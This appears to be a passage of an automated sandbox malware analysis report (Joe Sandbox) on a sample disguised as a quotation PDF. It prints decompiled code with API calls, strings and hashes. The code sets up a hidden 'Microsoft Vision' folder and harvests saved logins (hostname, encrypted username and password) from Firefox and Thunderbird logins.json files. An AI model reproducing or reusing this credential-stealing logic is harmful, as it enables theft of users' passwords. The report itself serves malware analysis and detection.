				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t95;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t133;
				intOrPtr _t134;
				intOrPtr _t138;
				signed int _t150;
				signed int _t159;
				intOrPtr _t165;
				intOrPtr _t171;
				void* _t179;
				void* _t182;

				_v48 = _a4;
				_v16 = GetModuleHandleA(0);
				_t150 = 0xa;
				memset( &_v144, 0, _t150 << 2);
				E00406F52( &_v8);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t75 =  *0x42cc9c; // 0x0
				E0040132F(_t75 + 0x210, 0, 0x800);
				_t78 =  *0x42cc9c; // 0x0
				E0040132F(_t78 + 0x10, 0, 0x208);
				_t182 = _t179 + 0x24;
				_t81 =  *0x42cc9c; // 0x0
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t81 + 0x10);
				_t83 =  *0x42cc9c; // 0x0
				lstrcatW(_t83 + 0x10, L"\\Microsoft Vision\\");
				_t86 =  *0x42cc9c; // 0x0
				CreateDirectoryW(_t86 + 0x10, 0);
				_t89 =  *0x42cc9c; // 0x0
				_t185 =  *((intOrPtr*)(_t89 + 0xa14));
				if( *((intOrPtr*)(_t89 + 0xa14)) != 0) {
					E0040132F( &_v840, 0, 0x208);
					_t182 = _t182 + 0xc;
					_t138 =  *0x42cc9c; // 0x0
					lstrcpyW( &_v840, _t138 + 0x10);
					lstrcatW( &_v840, "*");
					E00406F64(_t182,  &_v840);
					_v20 = E0041EE7B(_t185,  &_v160,  &_v8);
					_t171 =  *0x42cc9c; // 0x0
					_t186 = _t171 + 0xa18;
					E004029CC(_t171 + 0xa18, _t171 + 0xa18, _v20);
					E00401878( &_v160);
				}
				_v28 = E00406C53( &_v8, _t186, L"ExplorerIdentifier");
				_v24 = E00406D2E(_t186,  &_v32, 4);
				E00406CC1(_v28, _v24);
				E00406BE2();
				_t95 =  *0x42cc9c; // 0x0
				_t187 =  *((intOrPtr*)(_t95 + 0xa14));
				if( *((intOrPtr*)(_t95 + 0xa14)) != 0) {
					GetLocalTime( &_v76);
					wsprintfW( &_v320, L"%02d-%02d-%02d_%02d.%02d.%02d", _v76.wDay & 0x0000ffff, _v76.wMonth & 0x0000ffff, _v76.wYear & 0x0000ffff, _v76.wHour & 0x0000ffff, _v76.wMinute & 0x0000ffff, _v76.wSecond & 0x0000ffff);
					_t182 = _t182 + 0x20;
					_t124 =  *0x42cc9c; // 0x0
					_v36 = _t124 + 0xc;
					_t126 =  *0x42cc9c; // 0x0
					_v40 = E00406C53(_v36, _t187, _t126 + 0x10);
					E00406C53(_v40, _t187,  &_v320);
					_t165 =  *0x42cc9c; // 0x0
					_v44 = CreateFileW(E00406F44(_t165 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
					_t133 =  *0x42cc9c; // 0x0
					 *((intOrPtr*)(_t133 + 4)) = _v44;
					_t134 =  *0x42cc9c; // 0x0
					CloseHandle( *(_t134 + 4));
				}
				_v144.lpfnWndProc = E00413193;
				_v144.hInstance = _v16;
				_v144.lpszClassName = E00406F44( &_v8);
				RegisterClassW( &_v144);
				_v52 = CreateWindowExW(0, _v144.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v16, _v48);
				_t159 = 7;
				memset( &_v104, 0, _t159 << 2);
				while(1) {
					_v12 = GetMessageA( &_v104, _v52, 0, 0);
					if(_v12 == 0) {
						break;
					}
					if(_v12 != 0xffffffff) {
						TranslateMessage( &_v104);
						DispatchMessageA( &_v104);
						continue;
					}
					_v56 = _v12;
					E00406BE2();
					return _v56;
				}
				_v60 = _v104.wParam;
				E00406BE2();
				return _v60;
			}

0x00413c3d
0x00413c48
0x00413c4d
0x00413c56
0x00413c5b
0x00413c65
0x00413c66
0x00413c67
0x00413c68
0x00413c70
0x00413c7b
0x00413c8a
0x00413c93
0x00413c98
0x00413c9b
0x00413cac
0x00413cb7
0x00413cc0
0x00413cc8
0x00413cd1
0x00413cd7
0x00413cdc
0x00413ce3
0x00413cf3
0x00413cf8
0x00413cfb
0x00413d0b
0x00413d1d
0x00413d2d
0x00413d40
0x00413d46
0x00413d4c
0x00413d52
0x00413d5d
0x00413d5d
0x00413d6f
0x00413d7f
0x00413d88
0x00413d90
0x00413d95
0x00413d9a
0x00413da1
0x00413dab
0x00413ddb
0x00413de1
0x00413de4
0x00413dec
0x00413def
0x00413e00
0x00413e0d
0x00413e24
0x00413e39
0x00413e3c
0x00413e44
0x00413e47
0x00413e4f
0x00413e4f
0x00413e55
0x00413e62
0x00413e6d
0x00413e77
0x00413e9e
0x00413ea3
0x00413ea9
0x00413eab
0x00413ebc
0x00413ec3
0x00000000
0x00000000
0x00413ec9
0x00413ee4
0x00413eee
0x00000000
0x00413ef4
0x00413ece
0x00413ed4
0x00000000
0x00413ed9
0x00413ef9
0x00413eff
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00413C42
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00413CAC
lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00413CC0
CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 00413CD1
lstrcpyW.KERNEL32 ref: 00413D0B
lstrcatW.KERNEL32(?,00426D48), ref: 00413D1D

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Part of subcall function 0041EE7B: FindFirstFileW.KERNEL32(00000000,?), ref: 0041EEA0

GetLocalTime.KERNEL32(?,?,ExplorerIdentifier), ref: 00413DAB
wsprintfW.USER32 ref: 00413DDB
CreateFileW.KERNEL32(00000000,10000000,00000001,00000000,00000002,00000080,00000000,?,-00000010), ref: 00413E33
CloseHandle.KERNEL32(?), ref: 00413E4F
RegisterClassW.USER32 ref: 00413E77
CreateWindowExW.USER32 ref: 00413E98
GetMessageA.USER32 ref: 00413EB6
TranslateMessage.USER32(?), ref: 00413EE4
DispatchMessageA.USER32 ref: 00413EEE

Strings

\Microsoft Vision\, xrefs: 00413CB2
ExplorerIdentifier, xrefs: 00413D62
%02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00413DCF

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CreateMessage$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
API String ID: 3981409479-2372768292
Opcode ID: c11657c12192c5c7b5efa4feb673113304c0cf5eb39438a9a64a2e50b4d45ed0
Instruction ID: 6523d51687e5bcd97b03e823b49516ac4f04aebe362758d101507d4e10cf05eb
Opcode Fuzzy Hash: c11657c12192c5c7b5efa4feb673113304c0cf5eb39438a9a64a2e50b4d45ed0
Instruction Fuzzy Hash: 9F81FC71A00208EBDB10EFA5DC45FEDB7B9EB08304F51406AF509FB291DB74AA55CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00415E64 Relevance: 30.3, APIs: 3, Strings: 14, Instructions: 531
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00415E64(intOrPtr __ecx, void* __eflags, char _a4) {
				char _v5;
				void* _v6;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				signed char _v25;
				char _v26;
				char _v27;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				char _v52;
				signed int _v56;
				signed int _v60;
				void* _v64;
				void* _v68;
				char _v72;
				char _v80;
				long _v84;
				long _v88;
				char _v92;
				char _v96;
				char _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				WCHAR* _v116;
				WCHAR* _v120;
				char _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				char _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				char _v196;
				char _v200;
				char _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				char _v240;
				char _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				signed int _v260;
				signed int _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v300;
				short _v820;
				short _v1340;
				void* _t265;
				char _t312;
				char _t317;
				char _t348;
				char _t397;
				char _t401;
				char _t404;
				intOrPtr _t408;
				void* _t515;
				void* _t587;
				void* _t590;
				void* _t593;
				void* _t594;

				_t594 = __eflags;
				_v12 = __ecx;
				E0041E29B( &_v5);
				E00406F64( &_v20, L"Profile");
				E0040132F( &_v1340, 0, 0x208);
				_v56 = _v56 & 0x00000000;
				_v88 = _v88 & 0x00000000;
				_v84 = _v84 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				E0040132F( &_v820, 0, 0x104);
				_t265 = E00417BC1(_t594, L"firefox.exe",  &_v820, 0x104);
				_t590 = _t587 + 0x24;
				if(_t265 == 0) {
					_v6 = 0;
				} else {
					_v6 = 1;
				}
				_v25 = _v6;
				if((_v25 & 0x000000ff) != 0) {
					E00406F64( &_v52,  &_v820);
					lstrcatW( &_v820, L"\\firefox.exe");
					GetBinaryTypeW( &_v820,  &_v84);
					__eflags = _v84 - 6;
					if(_v84 != 6) {
						E00406FBC(_t590,  &_v52);
						__eflags = E004171FC(_v12, __eflags,  &_v52, 0);
						if(__eflags != 0) {
							L11:
							E00406C53( &_a4, __eflags, L"\\Mozilla\\Firefox\\");
							E00406FBC( &_v72,  &_a4);
							E00406C53( &_v72, __eflags, L"profiles.ini");
							E00406BFC( &_v20, E00406F64( &_v112, L"Profile"));
							E00406BE2();
							E00406CDA( &_v20, __eflags, _v56);
							while(1) {
								_v116 = E00406F44( &_v72);
								_v120 = E00406F44( &_v20);
								_v88 = GetPrivateProfileStringW(_v120, L"Path", 0,  &_v1340, 0x104, _v116);
								__eflags = _v88;
								if(_v88 == 0) {
									break;
								}
								_v56 = _v56 + 1;
								E00406BFC( &_v20, E00406F64( &_v124, L"Profile"));
								E00406BE2();
								E00406CDA( &_v20, __eflags, _v56);
								E00406FBC( &_v24,  &_a4);
								E00406C53( &_v24, __eflags,  &_v1340);
								E00406E4B( &_v24, __eflags,  &_v40);
								_v128 =  *((intOrPtr*)(_v12 + 0x84));
								_t312 = _v128(E00406B4A( &_v40));
								__eflags = _t312;
								if(_t312 == 0) {
									_v60 =  *((intOrPtr*)(_v12 + 0x9c))();
									__eflags = _v60;
									if(_v60 != 0) {
										_v132 =  *((intOrPtr*)(_v12 + 0x98));
										_t317 = _v132(_v60, 1, 0);
										_t590 = _t590 + 0xc;
										__eflags = _t317;
										if(_t317 == 0) {
											E00406FBC( &_v36,  &_v24);
											E00406C53( &_v36, __eflags, L"\\logins.json");
											E0041E9F8( &_v36, __eflags,  &_v16, 0x1a);
											E00406C53( &_v16, __eflags, "\\");
											E00406CC1( &_v16, E00406D2E(__eflags,  &_v136, 8));
											E00406BE2();
											E00406C53( &_v16, __eflags, L".tmp");
											__eflags = E0041EC89( &_v16,  &_v36,  &_v16);
											if(__eflags != 0) {
												E00406BFC( &_v36,  &_v16);
											}
											E0041F24C( &_v300, __eflags);
											__eflags = E0041EDB5( &_v300,  &_v36, 0xc0000000, 1);
											if(__eflags != 0) {
												E00406692( &_v80);
												E0041ED2A( &_v300,  &_v80, E0041EDDC( &_v300), 0);
												_v140 = E00406B58( &_v152, "encryptedUsername");
												_v144 = E004064E1( &_v80, __eflags,  &_v148);
												_v32 = E004148A1(_v144, _v140);
												E00406B06();
												E00406B06();
												while(1) {
													__eflags = _v32;
													if(__eflags == 0) {
														break;
													}
													E00419976( &_v276, __eflags);
													_v156 = E00406B58( &_v168, "hostname");
													_v160 = E004064E1( &_v80, __eflags,  &_v164);
													E0041490E(__eflags,  &_v100, _v160, _v156, _v32);
													E00406B06();
													E00406B06();
													_v172 = E00406B58( &_v184, "encryptedUsername");
													_v176 = E004064E1( &_v80, __eflags,  &_v180);
													E0041490E(__eflags,  &_v96, _v176, _v172, _v32);
													E00406B06();
													E00406B06();
													_v188 = E00406B58( &_v200, "encryptedPassword");
													_v192 = E004064E1( &_v80, __eflags,  &_v196);
													E0041490E(__eflags,  &_v92, _v192, _v188, _v32);
													_t593 = _t590 + 0x30;
													E00406B06();
													E00406B06();
													E00416647(_v12, __eflags, E00406B4A( &_v96),  &_v64);
													E00416647(_v12, __eflags, E00406B4A( &_v92),  &_v68);
													E00406BFC( &_v276, E00406770( &_v100, __eflags,  &_v204));
													E00406BE2();
													_v44 = _v64;
													_t397 = _v44 + 1;
													__eflags = _t397;
													_v208 = _t397;
													do {
														_v26 =  *_v44;
														_v44 = _v44 + 1;
														__eflags = _v26;
													} while (_v26 != 0);
													_t401 = _v44 - _v208;
													__eflags = _t401;
													_v212 = _t401;
													if(_t401 != 0) {
														_v216 = E00406B58( &_v224, _v64);
														E00406BFC( &_v272, E00406770(_v216, __eflags,  &_v220));
														E00406BE2();
														E00406B06();
													}
													_v48 = _v68;
													_t404 = _v48 + 1;
													__eflags = _t404;
													_v228 = _t404;
													do {
														_v27 =  *_v48;
														_v48 = _v48 + 1;
														__eflags = _v27;
													} while (_v27 != 0);
													_t408 = _v48 - _v228;
													__eflags = _t408;
													_v232 = _t408;
													if(_t408 != 0) {
														_v236 = E00406B58( &_v244, _v68);
														E00406BFC( &_v268, E00406770(_v236, __eflags,  &_v240));
														E00406BE2();
														E00406B06();
													}
													_v264 = _v264 & 0x00000000;
													_v248 = _v12;
													_t590 = _t593 - 0x10;
													E00403CD2(_t590,  &_v276);
													E00403E71(_v248);
													E0040B7DF(_v64);
													E0040B7DF(_v68);
													_v32 = _v32 - 1;
													E00406B06();
													E00406B06();
													E00406B06();
													E004018BB( &_v276, __eflags);
												}
												_t348 = E0041E9E4( &_v16);
												_pop(_t515);
												__eflags = _t348;
												if(_t348 != 0) {
													E00406FBC(_t590,  &_v16);
													E0041EE12(_t515);
												}
												_v252 =  *((intOrPtr*)(_v12 + 0xa0));
												_v252(_v60);
												 *((intOrPtr*)(_v12 + 0x88))();
												E004066DA();
												E0041EDEB( &_v300, __eflags);
												E00406BE2();
												E00406BE2();
												E00406B06();
												E00406BE2();
											} else {
												E0041EDEB( &_v300, __eflags);
												E00406BE2();
												E00406BE2();
												E00406B06();
												E00406BE2();
											}
											continue;
										}
										E00406B06();
										E00406BE2();
										continue;
									}
									E00406B06();
									E00406BE2();
									continue;
								}
								E00406B06();
								E00406BE2();
							}
							E00417176(_v12);
							_v256 = 1;
							E00406BE2();
							E00406BE2();
							E0041E292(E00406BE2(),  &_v5);
							E00406BE2();
							return _v256;
						}
						_v108 = _v108 & 0x00000000;
						E00406BE2();
						E0041E292(E00406BE2(),  &_v5);
						E00406BE2();
						return _v108;
					}
					E00406FBC(_t590,  &_v52);
					__eflags = E004171FC(_v12, __eflags,  &_v52, 1);
					if(__eflags != 0) {
						goto L11;
					}
					_v104 = _v104 & 0x00000000;
					E00406BE2();
					E0041E292(E00406BE2(),  &_v5);
					E00406BE2();
					return _v104;
				} else {
					_v260 = _v260 & 0x00000000;
					E0041E292(E00406BE2(),  &_v5);
					E00406BE2();
					return _v260;
				}
			}

0x00415e64
0x00415e6d
0x00415e73
0x00415e80
0x00415e93
0x00415e9b
0x00415e9f
0x00415ea3
0x00415ea7
0x00415eb9
0x00415ed2
0x00415ed7
0x00415edc
0x00415ee4
0x00415ede
0x00415ede
0x00415ede
0x00415eeb
0x00415ef4
0x00415f2a
0x00415f3b
0x00415f4c
0x00415f52
0x00415f56
0x00415fa9
0x00415fb6
0x00415fb8
0x00415fe6
0x00415fee
0x00415ffa
0x00416007
0x0041601d
0x00416025
0x00416030
0x00416035
0x0041603d
0x00416048
0x0041606a
0x0041606d
0x00416071
0x00000000
0x00000000
0x0041607b
0x0041608f
0x00416097
0x004160a2
0x004160ae
0x004160bd
0x004160c9
0x004160d7
0x004160e3
0x004160e7
0x004160e9
0x00416109
0x0041610c
0x00416110
0x00416130
0x0041613a
0x0041613d
0x00416140
0x00416142
0x00416160
0x0041616d
0x00416178
0x00416187
0x004161a0
0x004161ab
0x004161b8
0x004161cc
0x004161ce
0x004161d9
0x004161d9
0x004161e4
0x004161ff
0x00416201
0x00416236
0x00416253
0x00416268
0x0041627d
0x00416296
0x0041629f
0x004162aa
0x004162af
0x004162af
0x004162b3
0x00000000
0x00000000
0x004162bf
0x004162d4
0x004162e9
0x00416302
0x00416310
0x0041631b
0x00416330
0x00416345
0x0041635e
0x0041636c
0x00416377
0x0041638c
0x004163a1
0x004163ba
0x004163bf
0x004163c8
0x004163d3
0x004163e8
0x004163fd
0x00416418
0x00416423
0x0041642b
0x00416431
0x00416431
0x00416432
0x00416438
0x0041643d
0x00416440
0x00416443
0x00416443
0x0041644c
0x0041644c
0x00416452
0x00416458
0x00416468
0x00416487
0x00416492
0x0041649d
0x0041649d
0x004164a5
0x004164ab
0x004164ab
0x004164ac
0x004164b2
0x004164b7
0x004164ba
0x004164bd
0x004164bd
0x004164c6
0x004164c6
0x004164cc
0x004164d2
0x004164e2
0x00416501
0x0041650c
0x00416517
0x00416517
0x0041651c
0x00416526
0x0041652c
0x00416538
0x00416543
0x0041654b
0x00416554
0x0041655e
0x00416564
0x0041656c
0x00416574
0x0041657f
0x0041657f
0x0041658d
0x00416592
0x00416593
0x00416595
0x0041659e
0x004165a3
0x004165a8
0x004165b2
0x004165bb
0x004165c5
0x004165ce
0x004165d9
0x004165e1
0x004165e9
0x004165f1
0x004165f9
0x00416203
0x00416209
0x00416211
0x00416219
0x00416221
0x00416229
0x00416229
0x00000000
0x00416201
0x00416147
0x0041614f
0x00000000
0x0041614f
0x00416115
0x0041611d
0x00000000
0x0041611d
0x004160ee
0x004160f6
0x004160f6
0x00416606
0x0041660b
0x00416618
0x00416620
0x00416630
0x00416638
0x00000000
0x0041663d
0x00415fba
0x00415fc1
0x00415fd1
0x00415fd9
0x00000000
0x00415fde
0x00415f61
0x00415f6e
0x00415f70
0x00000000
0x00415f9e
0x00415f72
0x00415f79
0x00415f89
0x00415f91
0x00000000
0x00415ef6
0x00415ef6
0x00415f08
0x00415f10
0x00000000
0x00415f15

APIs

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Part of subcall function 00417BC1: lstrcpyW.KERNEL32 ref: 00417BF3
Part of subcall function 00417BC1: lstrcatW.KERNEL32(?,00000001), ref: 00417C03
Part of subcall function 00417BC1: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000104), ref: 00417C1D
Part of subcall function 00417BC1: RegQueryValueExW.ADVAPI32(00000104,Path,00000000,00000001,?,0041580F), ref: 00417C3C
Part of subcall function 00417BC1: RegCloseKey.ADVAPI32(00000104), ref: 00417C45

lstrcatW.KERNEL32(?,\firefox.exe), ref: 00415F3B
GetBinaryTypeW.KERNEL32(?,00000000), ref: 00415F4C

Part of subcall function 00406FBC: lstrcpyW.KERNEL32 ref: 00406FF9

Part of subcall function 004171FC: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0041722F

GetPrivateProfileStringW.KERNEL32 ref: 00416064

Strings

Profile, xrefs: 0041600C
\Mozilla\Firefox\, xrefs: 00415FE6
\logins.json, xrefs: 00416165
encryptedUsername, xrefs: 00416258
Profile, xrefs: 00415E78
Profile, xrefs: 0041607E
Path, xrefs: 0041605C
profiles.ini, xrefs: 00415FFF
\firefox.exe, xrefs: 00415F2F
.tmp, xrefs: 004161B0
hostname, xrefs: 004162C4
encryptedPassword, xrefs: 0041637C
encryptedUsername, xrefs: 00416320
firefox.exe, xrefs: 00415ECD

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen$BinaryCloseCurrentDirectoryOpenPrivateProfileQueryStringTypeValue
String ID: .tmp$Path$Profile$Profile$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$encryptedUsername$firefox.exe$hostname$profiles.ini
API String ID: 885898639-2141735189
Opcode ID: 9cd33e2dc7cc0ad52ffab9303e501675cd35b03f28c15e84c457f3f64b54ee3f
Instruction ID: a78ba437a369494698e72bd672ebe5856116627328333c0ca12f4676302b28e6
Opcode Fuzzy Hash: 9cd33e2dc7cc0ad52ffab9303e501675cd35b03f28c15e84c457f3f64b54ee3f
Instruction Fuzzy Hash: 03324D71C0012D9ADB14EBA1DC92BEDB778BF14304F5140AEE406B6191EF386B99CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041579C Relevance: 26.7, APIs: 2, Strings: 13, Instructions: 456
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041579C(intOrPtr __ecx, void* __eflags, char _a4) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				char _v52;
				char _v60;
				long _v64;
				long _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				WCHAR* _v88;
				WCHAR* _v92;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				char _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				signed int _v224;
				intOrPtr _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v264;
				short _v784;
				short _v1304;
				void* _t226;
				signed int _t261;
				intOrPtr _t266;
				signed int _t297;
				void* _t439;
				void* _t502;
				void* _t505;
				void* _t509;

				_t509 = __eflags;
				_v12 = __ecx;
				E0041E29B( &_v5);
				E00406F64( &_v24, L"Profile");
				E0040132F( &_v1304, 0, 0x208);
				_v40 = _v40 & 0x00000000;
				_v68 = _v68 & 0x00000000;
				_v64 = _v64 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				E0040132F( &_v784, 0, 0x104);
				E00417BC1(_t509, L"thunderbird.exe",  &_v784, 0x104);
				_t505 = _t502 + 0x24;
				E00406F64( &_v48,  &_v784);
				GetBinaryTypeW( &_v784,  &_v64);
				E00406FBC(_t505,  &_v48);
				_t390 = _v12;
				_t226 = E00416D22(_v12, _t509,  &_v48);
				_t510 = _t226;
				if(_t226 != 0) {
					L3:
					E00406C53( &_a4, __eflags, L"\\Thunderbird\\");
					E00406FBC( &_v52,  &_a4);
					E00406C53( &_v52, __eflags, L"profiles.ini");
					E00406BFC( &_v24, E00406F64( &_v84, L"Profile"));
					E00406BE2();
					E00406CDA( &_v24, __eflags, _v40);
					while(1) {
						_v88 = E00406F44( &_v52);
						_v92 = E00406F44( &_v24);
						_v68 = GetPrivateProfileStringW(_v92, L"Path", 0,  &_v1304, 0x104, _v88);
						__eflags = _v68;
						if(_v68 == 0) {
							break;
						}
						_v40 = _v40 + 1;
						E00406BFC( &_v24, E00406F64( &_v96, L"Profile"));
						E00406BE2();
						E00406CDA( &_v24, __eflags, _v40);
						E00406FBC( &_v20,  &_a4);
						E00406C53( &_v20, __eflags,  &_v1304);
						E00406E4B( &_v20, __eflags,  &_v36);
						_v100 =  *((intOrPtr*)(_v12 + 0x84));
						_t261 = _v100(E00406B4A( &_v36));
						__eflags = _t261;
						if(_t261 == 0) {
							_v44 =  *((intOrPtr*)(_v12 + 0x9c))();
							__eflags = _v44;
							if(_v44 != 0) {
								_v104 =  *((intOrPtr*)(_v12 + 0x98));
								_t266 = _v104(_v44, 1, 0);
								_t505 = _t505 + 0xc;
								__eflags = _t266;
								if(_t266 == 0) {
									E00406FBC( &_v32,  &_v20);
									E00406C53( &_v32, __eflags, L"\\logins.json");
									E0041E9F8( &_v32, __eflags,  &_v16, 0x1a);
									E00406C53( &_v16, __eflags, "\\");
									E00406CC1( &_v16, E00406D2E(__eflags,  &_v108, 8));
									E00406BE2();
									E00406C53( &_v16, __eflags, L".tmp");
									__eflags = E0041EC89( &_v16,  &_v32,  &_v16);
									if(__eflags != 0) {
										E00406BFC( &_v32,  &_v16);
									}
									E0041F24C( &_v264, __eflags);
									__eflags = E0041EDB5( &_v264,  &_v32, 0xc0000000, 1);
									if(__eflags != 0) {
										E00406692( &_v60);
										E0041ED2A( &_v264,  &_v60, E0041EDDC( &_v264), 0);
										_v112 = E00406B58( &_v124, "encryptedUsername");
										_v116 = E004064E1( &_v60, __eflags,  &_v120);
										_v28 = E004148A1(_v116, _v112);
										E00406B06();
										E00406B06();
										while(1) {
											__eflags = _v28;
											if(__eflags == 0) {
												break;
											}
											E00419976( &_v240, __eflags);
											_v128 = E00406B58( &_v140, "hostname");
											_v132 = E004064E1( &_v60, __eflags,  &_v136);
											E0041490E(__eflags,  &_v80, _v132, _v128, _v28);
											E00406B06();
											E00406B06();
											_v144 = E00406B58( &_v156, "encryptedUsername");
											_v148 = E004064E1( &_v60, __eflags,  &_v152);
											E0041490E(__eflags,  &_v76, _v148, _v144, _v28);
											E00406B06();
											E00406B06();
											_v160 = E00406B58( &_v172, "encryptedPassword");
											_v164 = E004064E1( &_v60, __eflags,  &_v168);
											E0041490E(__eflags,  &_v72, _v164, _v160, _v28);
											E00406B06();
											E00406B06();
											E00416647(_v12, __eflags, E00406B4A( &_v76),  &_v180);
											E00416647(_v12, __eflags, E00406B4A( &_v72),  &_v196);
											E00406BFC( &_v240, E00406770( &_v80, __eflags,  &_v176));
											E00406BE2();
											_v184 = E00406B58( &_v192, _v180);
											E00406BFC( &_v236, E00406770(_v184, __eflags,  &_v188));
											E00406BE2();
											E00406B06();
											_v200 = E00406B58( &_v208, _v196);
											E00406BFC( &_v232, E00406770(_v200, __eflags,  &_v204));
											E00406BE2();
											E00406B06();
											_v228 = 4;
											_v212 = _v12;
											_t505 = _t505 + 0x30 - 0x10;
											E00403CD2(_t505,  &_v240);
											E00403E71(_v212);
											_v28 = _v28 - 1;
											E00406B06();
											E00406B06();
											E00406B06();
											E004018BB( &_v240, __eflags);
										}
										_t297 = E0041E9E4( &_v16);
										_pop(_t439);
										__eflags = _t297;
										if(_t297 != 0) {
											E00406FBC(_t505,  &_v16);
											E0041EE12(_t439);
										}
										_v216 =  *((intOrPtr*)(_v12 + 0xa0));
										_v216(_v44);
										 *((intOrPtr*)(_v12 + 0x88))();
										E004066DA();
										E0041EDEB( &_v264, __eflags);
										E00406BE2();
										E00406BE2();
										E00406B06();
										E00406BE2();
									} else {
										E0041EDEB( &_v264, __eflags);
										E00406BE2();
										E00406BE2();
										E00406B06();
										E00406BE2();
									}
									continue;
								}
								E00406B06();
								E00406BE2();
								continue;
							}
							E00406B06();
							E00406BE2();
							continue;
						}
						E00406B06();
						E00406BE2();
					}
					E00416C9C(_v12);
					_v220 = 1;
					E00406BE2();
					E00406BE2();
					E0041E292(E00406BE2(),  &_v5);
					E00406BE2();
					return _v220;
				}
				E00406FBC(_t505,  &_v48);
				if(E00416D22(_v12, _t510, _t390) != 0) {
					goto L3;
				}
				_v224 = _v224 & 0x00000000;
				E00406BE2();
				E0041E292(E00406BE2(),  &_v5);
				E00406BE2();
				return _v224;
			}

0x0041579c
0x004157a5
0x004157ab
0x004157b8
0x004157cb
0x004157d3
0x004157d7
0x004157db
0x004157df
0x004157f1
0x0041580a
0x0041580f
0x0041581c
0x0041582c
0x00415839
0x0041583e
0x00415841
0x00415846
0x00415848
0x00415894
0x0041589c
0x004158a8
0x004158b5
0x004158cb
0x004158d3
0x004158de
0x004158e3
0x004158eb
0x004158f6
0x00415918
0x0041591b
0x0041591f
0x00000000
0x00000000
0x00415929
0x0041593d
0x00415945
0x00415950
0x0041595c
0x0041596b
0x00415977
0x00415985
0x00415991
0x00415995
0x00415997
0x004159b7
0x004159ba
0x004159be
0x004159de
0x004159e8
0x004159eb
0x004159ee
0x004159f0
0x00415a0e
0x00415a1b
0x00415a26
0x00415a35
0x00415a4b
0x00415a53
0x00415a60
0x00415a74
0x00415a76
0x00415a81
0x00415a81
0x00415a8c
0x00415aa7
0x00415aa9
0x00415ade
0x00415afb
0x00415b0d
0x00415b1c
0x00415b2c
0x00415b32
0x00415b3a
0x00415b3f
0x00415b3f
0x00415b43
0x00000000
0x00000000
0x00415b4f
0x00415b64
0x00415b76
